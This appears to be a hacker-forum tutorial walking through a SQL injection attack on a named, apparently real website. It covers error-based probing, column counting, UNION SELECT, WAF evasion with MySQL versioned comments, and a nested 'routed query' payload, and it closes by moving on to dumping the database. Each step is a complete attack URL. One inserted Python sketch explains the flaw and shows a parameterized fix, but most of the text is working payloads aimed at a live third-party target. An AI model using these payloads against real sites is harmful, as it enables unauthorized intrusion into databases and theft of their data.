SQLi Routed Query Method

Hello to all my friends, again I'm Mr.GonzX

Today I will write an article about SQLi Routed Query

Target site : http://www.jeffreycarbo.com/page.php?name=3

This is the normal page. Never mind that error, let's imagine that that's the normal page


When I put ' in the parameter I got an error like this. Remember that the first error is the normal page; then I put ' and we got another error, which means the website is vulnerable to SQLi

http://www.jeffreycarbo.com/page.php?name=3'


Let's balance the query

http://www.jeffreycarbo.com/page.php?name=3'--+-

The error was removed



Let's use order by to see how many columns there are

http://www.jeffreycarbo.com/page.php?name=3'+order+by+2--+-


When I used order+by+2 we got an error, so let's try order+by+1

http://www.jeffreycarbo.com/page.php?name=3'+order+by+1--+-


With order+by+1 the error was removed, which means we have 1 column. The next step is union select

http://www.jeffreycarbo.com/page.php?name=3'+and+0+union+select+1--+-



The website is protected by a WAF, now let's bypass it

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1--+-


Yes, I bypassed the WAF, but the problem is that the vulnerable column is not showing. I used some tricks to get the vulnerable column, but they are not working

name=3 having 1
name=-3
name=(3)
name=3 and 0
name=3 and true

I used all those tricks but they are not working :(

So it's time to use SQLi Routed Query :)

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1--+-

I put a single quote on column 1 and my query looks like this

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1'--+-

I put the 1' inside double quotes and my query looks like this

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'"--+-


And we got an error, which means the site is vulnerable to Routed Query :)
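Why the `"1'"` test value produces a new error, shown from the code side as an added example (not the author's code and not the site's): the page runs two statements, and the value returned by the first is concatenated into the second. The table names, function names and the use of SQLite in place of the site's MySQL are assumptions made for the sketch; the hardened version binds both values.

```python
import sqlite3

def make_db():
    # Constructed sample schema; the real tables behind page.php are not known.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (name TEXT, section_id INTEGER);
        CREATE TABLE sections (id INTEGER, title TEXT, body TEXT);
        INSERT INTO pages VALUES ('3', 1);
        INSERT INTO sections VALUES (1, 'Home', 'Welcome');
    """)
    return conn

def render_vulnerable(conn, name):
    # Query 1: request input is concatenated into the SQL text.
    row = conn.execute(
        "SELECT section_id FROM pages WHERE name = '" + name + "'").fetchone()
    if row is None:
        return []
    # Query 2: the *result* of query 1 is concatenated into a second statement.
    # Whoever controls query 1's output controls this SQL text (the "routing").
    return conn.execute(
        "SELECT title, body FROM sections WHERE id = " + str(row[0])).fetchall()

def render_hardened(conn, name):
    # Both statements bind their values, so neither the request input nor the
    # routed value is ever parsed as SQL.
    row = conn.execute(
        "SELECT section_id FROM pages WHERE name = ?", (name,)).fetchone()
    if row is None:
        return []
    return conn.execute(
        "SELECT title, body FROM sections WHERE id = ?", (row[0],)).fetchall()

def second_query_error(conn, name):
    """Return the database error raised by the vulnerable path, or None."""
    try:
        render_vulnerable(conn, name)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)

# Constructed probe: the SQLite spelling of the article's "1'" test value.
PROBE = "3' AND 0 UNION SELECT '1'''-- "

if __name__ == "__main__":
    db = make_db()
    print(render_vulnerable(db, "3"))     # normal page
    print(second_query_error(db, PROBE))  # error comes from query 2
    print(render_hardened(db, PROBE))     # probe is just a name with no match
```

Binding only the first statement is not a complete fix: any value that reaches the second statement as text, including data already stored in the database, must be bound as well.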

The next step is balancing the comment/query

My query looks like this

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'--+-"--+-

But I got an error, let's try union based

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1--"--+-

Yes, the error was removed :)


The next step is order by, so I tried order by 9 but I got an error, then I decreased to 8 and boom, the error was removed :)

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1+order+by+8--"--+-


Now it's time for union select

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1+and+0+union+select+1,2,3,4,5,6,7,8--"--+-

But I got the WAF again :(


Now let's bypass :)

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8--"--+-

And Boom!


The vulnerable column is now showing, it's time for DIOS :)


Thanks for reading my article :)

You can also visit my YouTube channel for more tutorials :)
YouTube: Gonz Official